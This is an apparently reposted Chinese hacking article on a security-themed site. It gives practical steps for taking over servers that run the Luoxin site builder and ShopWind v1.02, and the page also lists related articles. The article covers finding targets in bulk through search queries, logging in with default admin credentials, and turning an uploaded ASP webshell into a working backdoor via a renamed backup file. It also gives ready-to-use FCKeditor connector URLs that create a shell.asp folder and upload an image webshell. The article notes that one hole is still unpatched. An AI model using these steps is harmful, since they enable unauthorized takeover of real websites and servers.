游乐游手机版
首页/网络安全/文章详情

ShopWind网店系统与罗信网络建站v1.02上传漏洞

时间:2026-07-23 06:27
本文将分享两个实战中可用的漏洞利用技巧,分别针对罗信网络建站系统与ShopWind网店系统。直接进入正题,干货满满。 罗信网络建站系统0DAY漏洞详解 批量定位目标非常简单,只需在百度或谷歌搜索“技术支持:罗信网络”即可快速找到大量站点。 后台管理地址为站点路径后添加 lx,直接访问即可进入登录页面

本文将分享两个实战中可用的漏洞利用技巧,分别针对罗信网络建站系统与ShopWind网店系统。直接进入正题,干货满满。

罗信网络建站系统0DAY漏洞详解

批量定位目标非常简单,只需在百度或谷歌搜索“技术支持:罗信网络”即可快速找到大量站点。

后台管理地址为站点路径后添加/lx,直接访问即可进入登录页面。

数据库文件地址则是在站点路径后拼接/lx/databases/,再附上主域名后加.asp(具体文件名需要根据实际情况猜测)。

默认管理账号与密码均为admin。接下来是获取服务器权限的关键步骤。

首先,上传一个后缀名为.jpg的asp一句话木马——没错,就是图片格式的asp马。

随后利用数据库备份功能。需注意:该功能仅允许备份.mdb后缀的文件。那么如何将我们的asp马转化为可执行的后门?还记得经典的x.asp;x.jpg格式吗?这里我们换一种思路:备份时将文件命名为x.asp;x.mdb。完成后,访问备份生成的shell即可执行任意命令。

此外,还存在一个在线编辑器入口:站点+/lx/edit/admin_login.asp,对应的编辑器数据库地址为站点/lx/edit/db/%23edit.mdb。截至目前,官方仍未修复此漏洞。


ShopWind网店系统 v1.02 上传漏洞分析与利用

该程序采用FCKeditor编辑器,利用的是Windows 2003服务器对文件解析的经典特性。直接给出利用方法,两步即可完成:

第一步,创建特殊目录:
FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975684

第二步,通过浏览器上传一个jpg格式的asp一句话木马:
fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=../../connectors/asp/connector.asp

利用2003解析漏洞,最终成功获取服务器权限。整个过程无需复杂绕过,按上述步骤操作即可实现。

来源:https://www.jb51.net/hack/26335.html
上一篇微软警告非官方Windows 7成黑客攻击目标 下一篇全面提升网络安全软实力的关键策略与路径
本站内容用于信息整理与展示,如有侵权或内容问题请及时联系处理。

相关推荐

补充同频道和同主题内容,方便继续浏览更多相关内容。

同类最新

继续查看同栏目最近更新的文章。

更多
零基础Python网络安全学习指南,包住宿实战培训
网络安全 · 2026-07-25

零基础Python网络安全学习指南,包住宿实战培训

先抛出几个核心判断:网络安全人才缺口确实已经超过70万。这个数字不算夸张,各大招聘网站上安全岗位的薪资涨幅和需求增长都是实实在在的。但实话实说,行业真正缺的是能上手干活的人,不是只懂几个理论概念的新手。因此,一套扎实且成体系的训练方案,对于零基础转行或进阶提升就显得格外关键。 从零基础到能够独立应对

网络安全定义与核心概念详解
网络安全 · 2026-07-25

网络安全定义与核心概念详解

谈到网络安全,不同组织与标准体系对其定义虽有差异,但核心目标高度统一:保护信息与系统不受威胁侵害。以下梳理几种主流定义—— 什么是网络安全? 国际标准化组织(ISO)在ISO-74982文献中将安全定义为:最大程度地降低数据和资源遭受攻击的可能性。该定义虽简短,却精准点出安全的本质——即风险控制。

IIS 7.0网站漏洞利用与修复方法指南
网络安全 · 2026-07-25

IIS 7.0网站漏洞利用与修复方法指南

先来聊聊当前网络安全领域比较流行的一种实战技巧——以PHP环境为例,详细讲解图片马合并与解析漏洞利用的具体操作步骤。整个过程并不复杂,但细节往往决定成败,大家跟着流程逐步操作即可。 合并一张PHP一句话图片马 首先,我们需要将一句话木马脚本与一张正常图片合并,生成一个看似无害的图片文件。合并方式主要

织梦管理系统后台查找功能教程
网络安全 · 2026-07-25

织梦管理系统后台查找功能教程

通过SQL注入漏洞获取织梦CMS(DedeCMS)管理员密码后,满怀期待地准备进入后台,却发现怎么也找不到登录入口——这种情况其实相当常见。别着急,这里有一个实用的技巧值得尝试。 直接在网站地址后面添加以下路径: include dialog select_media php?f=form1 mur

微软IE浏览器BrowseDialog类(ccrpbds6.dll)拒绝服务安全漏洞深度分析
网络安全 · 2026-07-25

微软IE浏览器BrowseDialog类(ccrpbds6.dll)拒绝服务安全漏洞深度分析

BrowseDialog Class (ccrpbds6 dll) 导致 Internet Explorer 拒绝服务漏洞分析 该漏洞的PoC(概念验证代码)实现极为直接——触发浏览器崩溃的条件简单得令人意外。测试环境采用Windows XP Professional SP2(已安装全部补丁)并运行